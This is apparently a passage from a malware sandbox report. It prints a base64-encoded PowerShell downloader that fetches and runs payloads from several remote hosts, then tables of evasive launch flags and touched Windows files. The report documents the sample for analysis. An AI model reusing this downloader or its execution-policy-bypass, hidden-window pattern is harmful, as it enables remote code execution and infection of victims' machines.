YwBBAEIAbwBBAEcARQBBAFoAUQBCAHUAQQBHAGsAQQBaAEEAQgBRAEEARwBnAEEAWgBRAEIAdQBBAEcAOABBAGUAQQBCAHAAQQBHAFEAQQBMAGcAQgB1AEEARwBjAEEAYgB3AEEAPQB5AHIAPQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAEkAQQBhAFEAQgB2AEEASABBAEEAYQBBAEIANQBBAEgAUQBBAFoAUQBCAFEAQQBIAEkAQQBaAFEAQgB3AEEARwBFAEEAYwBnAEIAaABBAEgAUQBBAGEAUQBCADIAQQBHAFUAQQBMAGcAQgAwAEEARwA4AEEAZQBRAEIAegBBAEEAPQA9ACIAOwB0AHIAeQAgAHsAJAB0AGUAbABlAGMAYQBtAGUAcgBhACAAPQAgADMAMAA0ADsAJABpAG4AYwBsAGEAcwBwAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAaQBuAGMAbwBtAG0AbwBkAGkAbwB1AHMAKQApADsAaQB3AHIAIAAkAGkAbgBjAGwAYQBzAHAAcwAgAC0ATwAgAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAGYAbwB1AGwAaQBzAGgAUgBpAHYAZQByAGwAZQBzAHMALgBBAGcAbwBuAGkAYQBQAGgAbwBuAG8AbQBpAG0AaQBjADsAJABjAGEAZQBzAGEAcgBpAHMAdABzACAAPQAgACIAUwBhAHIAbwBuAGkAYwBJAG4AdgBhAGcAaQBuAGEAdABpAG4AZwAiADsAJABUAHcAaQBzAHQAZQBuAGUAZABIAGUAbQBpAGUAcABpAGwAZQBwAHMAeQAgAD0AIAAiAHIAZQBjAGEAcAB0AGkAdgBhAHQAaQBvAG4AUwBpAG0AcABsAHkAIgA7ACQAdABpAHQAbABlAG4AZQBHAHUAbgBkAGkAZQAgAD0AIAAiAE4AbwBuAGIAYQBzAGUAbQBlAG4AdABXAGkAcwBlAGgAZQBhAHIAdABlAGQAIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIABDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABmAG8AdQBsAGkAcwBoAFIAaQB2AGUAcgBsAGUAcwBzAC4AQQBnAG8AbgBpAGEAUABoAG8AbgBvAG0AaQBtAGkAYwApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADEAMgA3ADAAOAAwACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEAUQB3AEEANgBBAEYAdwBBAFUAQQBCAHkAQQBHADgAQQBaAHcAQgB5AEEARwBFAEEAYgBRAEIARQBBAEcARQBBAGQAQQBCAGgAQQBGAHcAQQBaAGcAQgB2AEEASABVAEEAYgBBAEIAcABBAEgATQBBAGEAQQBCAFMAQQBHAGsAQQBkAGcAQgBsAEEASABJAEEAYgBBAEIAbABBAEgATQBBAGMAdwBBAHUAQQBFAEUAQQBaAHcAQgB2AEEARwA0AEEAYQBRAEIAaABBAEYAQQBBAGEAQQBCAHYAQQBHADQAQQBiAHcAQgB0AEEARwBrAEEAYgBRAEIAcABBAEcATQBBAEwAQQBCAHcAQQBIAEkAQQBhAFEAQgB1AEEASABRAEEATwB3AEIATwBBAEcAVQBBAGUAQQBCADAAQQBFAG8AQQBVAHcAQQA9ACIAOwAkAE4AdQBuAG4AaQBzAGgAIAA9ACAAIgBJAGcAbgBlAG8AYQBxAHUAZQBvAHUAcwBVAG4AcgBvAGIAZQBkACIAOwAkAFEAdQBlAHMAdABpAG8AbgBhAGIAbABlACAAPQAgACIARwBvAG8AcwBlAGIAZQByAHIAeQBOAG8AbgBjAG8AZQByAGMAaQBvAG4AIgA7AGIAcgBlAGEAawA7AE4AZQB4AHQASgBTADsAfQBOAGUAeAB0AEoAUwA7AH0AIABjAGEAdABjAGgAIAB7ACQAdgBlAHIAbgBpAHgAZQBzAFMAbgBhAHAAZAByAGEAZwBvAG4AcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQATQBBAE8AUQBBAHUAQQBEAEkAQQBNAEEAQQAyAEEAQwA0AEEATgBBAEEAMQBBAEMANABBAE0AUQBBADAAQQBEAEkAQQB4AE8ATQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAEQAQQBHADgAQQBiAEEAQgBzAEEARwBVAEEAZABBAEIAcABBAEcANABBAFoAdwBCAFcAQQBHAFUAQQBjAGcAQgB1AEEARwBFAEEAWQB3AEIAMQBBAEcAdwBBAFkAUQBCAHkAQQBHAGsAQQBjAHcAQgAwAEEAQwA0AEEAWQB3AEIAeQBBAEcAawBBAFkAdwBCAHIAQQBHAFUAQQBkAEEAQQA9AHgATwBNAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAUwBBAEcARQBBAGQAZwBCAGwAQQBHAHcAQQBhAFEAQgB1AEEARwBjAEEAYwB3AEIAUABBAEgAVQBBAGQAQQBCAHoAQQBHAEUAQQBkAEEAQQB1AEEARwAwAEEAWgBRAEEAPQAiADsAJABDAG8AbgBjAGUAcwBzAGkAbwBuAGEAaQByAGUAcwBHAGwAdQBtAHAAaQBuAGUAcwBzACAAPQAgACIAQgB1AHAAbABlAHUAcgB1AG0AQwBhAHQAZQBnAG8AcgBpAHMAZQAiADsAJABhAHMAYwBhAGIAYQByAHQARgBhAGMAaQBsAGkAdABhAHQAaQB2AGUAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEEAQQBOAHcAQQB1AEEARABVAEEATgBBAEEAdQBBAEQAawBBAE0AZwBBAHUAQQBEAFUAQQBOAFEAQQA9AGsAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQBrAEEAYgBRAEIAdwBBAEgASQBBAFoAUQBCAHoAQQBIAE0AQQBZAFEAQgB5AEEARwBrAEEATABnAEIAbwBBAEcAOABBAGIAQQBCAGsAQQBHAGsAQQBiAGcAQgBuAEEASABNAEEAawBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAHUAQQBHADgAQQBiAGcAQgB6AEEARwBVAEEAYwBnAEIAcABBAEcAOABBAGQAUQBCAHoAQQBHAHcAQQBlAFEAQQB1AEEARwBFAEEAWQB3AEIAagBBAEcAOABBAGQAUQBCAHUAQQBIAFEAQQBZAFEAQgB1AEEASABRAEEAYwB3AEEAPQBrAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAMQBBAEcANABBAGMAUQBCADEAQQBHAFUAQQBjAGcAQgBwAEEARwBVAEEAWgBBAEEAdQBBAEcAWQBBAGMAZwBBAD0AIgA7AH0AfQAkAEUAeABzAGUAYwBhAG4AdABzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEASABJAEEAWQBRAEIAMABBAEgAUQBBAGIAQQBCAGwAQQBHAEkAQQBkAFEAQgB6AEEARwBnAEEAUQBnAEIAcABBAEcAYwBBAGEAQQBCADAAQQBHAFUAQQBaAEEAQQB1AEEARwAwAEEAWQBRAEIAeQBBAEcAcwBBAFoAUQBCADAAQQBBAD0APQAiADsAJABzAHEAdQBpAGIAcwB0AGUAcgBIAGUAeABhAG0AZQB0AGgAeQBsAGUAbgBlAHQAZQB0AHIAYQBtAGkAbgBlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBRAEEAYwBnAEIAaABBAEcATQBBAGEAQQBCAGwAQQBHAGsAQQBaAEEAQgBsAEEARQA4AEEAWgBnAEIAbQBBAEcAVQBBAGIAZwBCAHoAQQBHAGsAQQBkAGcAQgBsAEEASABNAEEATABnAEIAdABBAEcAOABBAGIAUQBBAD0AbABpAEEAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATgB3AEEAeQBBAEMANABBAE0AZwBBAHkAQQBEAEUAQQBMAGcAQQB5AEEARABRAEEATgBBAEEAdQBBAEQASQBBAE0AQQBBADEAQQBBAD0APQBsAGkAQQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAGcAQQBOAHcAQQB1AEEARABFAEEATQBnAEEAeQBBAEMANABBAE0AUQBBADQAQQBEAEkAQQBMAGcAQQAzAEEARABNAEEAIgA7ACQAdAByAG8AcABoAG8AZABlAHIAbQBCAGUAbgB6AGkAbAAgAD0AIAAyADEANwA7AA==" |
option | -executionpolicy bypass | value | Attempts to bypass execution policy | ||||||
option | -noprofile | value | Does not load current user profile | ||||||
option | -nologo | value | Hides the copyright banner when PowerShell launches | ||||||
option | -windowstyle hidden | value | Attempts to execute command with a hidden window | ||||||
option | -executionpolicy bypass | value | Attempts to bypass execution policy | ||||||
option | -noprofile | value | Does not load current user profile | ||||||
option | -nologo | value | Hides the copyright banner when PowerShell launches | ||||||
option | -windowstyle hidden | value | Attempts to execute command with a hidden window |
file | C:\Windows\SysWOW64\wscript.exe |
file | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
file | C:\Windows\System32\ie4uinit.exe |
file | C:\Program Files\Windows Sidebar\sidebar.exe |
file | C:\Windows\System32\WindowsAnytimeUpgradeUI.exe |
file | C:\Windows\System32\xpsrchvw.exe |
file | C:\Windows\System32\displayswitch.exe |
file | C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe |
file | C:\Windows\System32\mblctr.exe |
file | C:\Windows\System32\mstsc.exe |
file | C:\Windows\System32\SnippingTool.exe |
file | C:\Windows\System32\SoundRecorder.exe |
file | C:\Windows\System32\dfrgui.exe |
file | C:\Windows\System32\msinfo32.exe |
file | C:\Windows\System32\rstrui.exe |
file | C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe |
file | C:\Program Files\Windows Journal\Journal.exe |
file | C:\Windows\System32\MdSched.exe |
file | C:\Windows\System32\msconfig.exe |
file | C:\Windows\System32\recdisc.exe |
file | C:\Windows\System32\msra.exe |